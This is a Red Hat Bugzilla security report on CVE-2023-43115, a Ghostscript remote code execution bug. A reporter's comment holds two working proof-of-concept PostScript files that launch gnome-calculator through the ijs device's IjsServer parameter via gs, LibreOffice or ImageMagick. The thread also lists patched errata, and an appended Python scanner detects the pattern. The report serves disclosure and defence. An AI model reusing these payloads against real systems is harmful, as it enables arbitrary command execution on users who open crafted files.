Bug 2241108 (CVE-2023-43115)

| Summary: | CVE-2023-43115 Ghostscript: GhostPDL can lead to remote code execution via crafted PostScript documents | | |
|---|---|---|---|
| Product: | [Other] Security Response | Reporter: | Dhananjay Arunesh <darunesh> |
| Component: | vulnerability | Assignee: | Product Security <prodsec-ir-bot> |
| Status: | NEW --- | QA Contact: | |
| Severity: | high | Docs Contact: | |
| Priority: | high | | |
| Version: | unspecified | CC: | alexander.neumann, bmason, daniel, pdwyer, xili |
| Target Milestone: | --- | Keywords: | Security |
| Target Release: | --- | | |
| Hardware: | All | | |
| OS: | Linux | | |
| Whiteboard: | | | |
| Fixed In Version: | | Doc Type: | If docs needed, set a value |
| Doc Text: | A vulnerability was found in Artifex Ghostscript in gdevijs.c that allows a malicious remote attacker to perform remote code execution via crafted PostScript documents. | | |
| Story Points: | --- | | |
| Clone Of: | | Environment: | |
| Last Closed: | | Type: | --- |
| Regression: | --- | Mount Type: | --- |
| Documentation: | --- | CRM: | |
| Verified Versions: | | Category: | --- |
| oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
| Cloudforms Team: | --- | Target Upstream Version: | |
| Embargoed: | | | |
| Bug Depends On: | 2241112 | | |
| Bug Blocks: | 2241109 | | |
Description
Dhananjay Arunesh
2023-09-28 06:36:11 UTC
Created ghostscript tracking bugs for this issue:

Affects: fedora-all [bug 2241112]

So, what's the current status regarding this vulnerability? This is highly critical: At the moment, on a fully updated Fedora 38, attackers can execute arbitrary commands when users open/use postscript files.

In the following, I'll describe two ways to exploit this (and start gnome-calculator as an example):

1. Run `gs calc.ps` with the following file (or insert it as an image in LibreOffice):

------------------
%!PS-Adobe-3.0 EPSF-3.0
%%Document-Fonts: Times-Roman
%%Title: print_version.eps
%%Creator: PS_Write.F
%%CreationDate: 02-Aug-99
%%Pages: 1
%%BoundingBox: 36 36 576 756
%%LanguageLevel: 1
%%EndComments
%%BeginProlog
%%EndProlog
<< /OutputDevice /ijs /IjsServer (gnome-calculator) >> setpagedevice
------------------

2. Via ImageMagick: run `convert calc-convert.ps calc-convert.png`:

------------------
%!PS-Adobe-3.0 EPSF-3.0
%%Document-Fonts: Times-Roman
%%Title: print_version.eps
%%Creator: PS_Write.F
%%CreationDate: 02-Aug-99
%%Pages: 1
%%BoundingBox: 36 36 576 756
%%LanguageLevel: 1
%%EndComments
%%BeginProlog
%%EndProlog
% this is somehow needed to not get a null pointer dereference (will basically initialize the ijs device a bit, and then complain about unset IjsServer):
{ (ijs) finddevice setdevice } stopped {} {} ifelse pop
% set ijserver to payload
{ mark /IjsServer (/usr/bin/gnome-calculator) (ijs) finddevice putdeviceprops setdevice } stopped {} {} ifelse pop
------------------

What's the plan here? :)

Just to be clear: opening a LibreOffice document is enough to trigger the RCE: we've made a video here: https://twitter.com/RedTeamPT/status/1712379361146318896

Here's a video which shows the exploit for convert: https://twitter.com/RedTeamPT/status/1712379364136964411

(In reply to Alexander Neumann from comment #4)
> Just to be clear: opening a LibreOffice document is enough to trigger the
> RCE: we've made a video here:
> https://twitter.com/RedTeamPT/status/1712379361146318896
>
> Here's a video which shows the exploit for convert:
> https://twitter.com/RedTeamPT/status/1712379364136964411

Hey Alexander, thanks for flagging that this had been missed. Updates to supported versions of Fedora (38: https://bodhi.fedoraproject.org/updates/FEDORA-2023-66d60c3df7, 39: https://bodhi.fedoraproject.org/updates/FEDORA-2023-c2665a9ff3) have been submitted, and will roll out once they have enough upvotes or time passes. I've also proposed this as a Final Release Blocker for Fedora 39, so it should be fixed from day one there (https://pagure.io/fedora-qa/blocker-review/issue/1408).

Cool, thanks for the feedback! We really appreciate your work!

This issue has been addressed in the following products:

Red Hat Enterprise Linux 9.0 Extended Update Support

Via RHSA-2023:5868 https://access.redhat.com/errata/RHSA-2023:5868

This issue has been addressed in the following products:

Red Hat Enterprise Linux 9

Via RHSA-2023:6265 https://access.redhat.com/errata/RHSA-2023:6265

This issue has been addressed in the following products:

Red Hat Enterprise Linux 9

Via RHSA-2023:6732 https://access.redhat.com/errata/RHSA-2023:6732
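As an added example (not code from this bug report, Ghostscript or Fedora), a pre-filter a defender can run over PostScript files before handing them to gs or ImageMagick: it flags selection of the ijs device in either shape seen in the thread above, decodes the IjsServer value from both PostScript string syntaxes (literal and hex), and reports any server outside an assumed allowlist, which here contains only HPLIP's hpijs. The sample inputs are constructed from the two files posted above.

```python
import re

# Assumption for this example: the only IJS server this site expects to see
# is HPLIP's "hpijs"; any other IjsServer value is treated as a finding.
ALLOWED_IJS_SERVERS = {"hpijs"}

# A PostScript string is either a (literal) string, possibly with escapes and
# one level of nested parentheses, or a <hex> string.
_PS_STRING = r"\((?P<lit>(?:[^()\\]|\\.|\([^()]*\))*)\)|<(?P<hex>[0-9A-Fa-f\s]*)>"
_IJS_SERVER_RE = re.compile(r"/IjsServer\s*(?:" + _PS_STRING + r")")
# Both ways the report selects the ijs device: setpagedevice or finddevice.
_IJS_DEVICE_RE = re.compile(r"/OutputDevice\s*/ijs\b|\(ijs\)\s*finddevice")


def _decode_ps_string(m: re.Match) -> str:
    """Return the Python text of a matched PostScript string (either form)."""
    if m.group("hex") is not None:
        digits = re.sub(r"\s+", "", m.group("hex"))
        if len(digits) % 2:  # PostScript treats a missing final digit as 0
            digits += "0"
        return bytes.fromhex(digits).decode("latin-1")
    escapes = {"n": "\n", "r": "\r", "t": "\t"}
    return re.sub(r"\\(.)", lambda e: escapes.get(e.group(1), e.group(1)),
                  m.group("lit"))


def scan_postscript(text: str) -> list[str]:
    """Findings for one PostScript document; an empty list means nothing seen."""
    findings = []
    if _IJS_DEVICE_RE.search(text):
        findings.append("selects the ijs output device")
    for m in _IJS_SERVER_RE.finditer(text):
        server = _decode_ps_string(m)
        if server not in ALLOWED_IJS_SERVERS:
            findings.append(f"IjsServer set to non-allowlisted program {server!r}")
    return findings


# Constructed samples: the two shapes from the report, a hex-string variant of
# the first, and a benign file that never touches the ijs device.
SAMPLE_SETPAGEDEVICE = "<< /OutputDevice /ijs /IjsServer (gnome-calculator) >> setpagedevice\n"
SAMPLE_FINDDEVICE = ("{ (ijs) finddevice setdevice } stopped {} {} ifelse pop\n"
                     "{ mark /IjsServer (/usr/bin/gnome-calculator) (ijs) finddevice "
                     "putdeviceprops setdevice } stopped {} {} ifelse pop\n")
SAMPLE_HEX = "<< /OutputDevice /ijs /IjsServer <" + b"gnome-calculator".hex() + "> >> setpagedevice\n"
SAMPLE_BENIGN = "%!PS-Adobe-3.0\n/Times-Roman findfont 12 scalefont setfont\n72 72 moveto (Hello) show showpage\n"

if __name__ == "__main__":
    for name, doc in [("setpagedevice", SAMPLE_SETPAGEDEVICE), ("finddevice", SAMPLE_FINDDEVICE),
                      ("hex", SAMPLE_HEX), ("benign", SAMPLE_BENIGN)]:
        print(name, "->", scan_postscript(doc) or "clean")
```

PostScript is a full programming language, so a file can assemble these names at run time and pass a static scan like this one; treat it as triage alongside the patched packages in the errata above, not as a replacement for them.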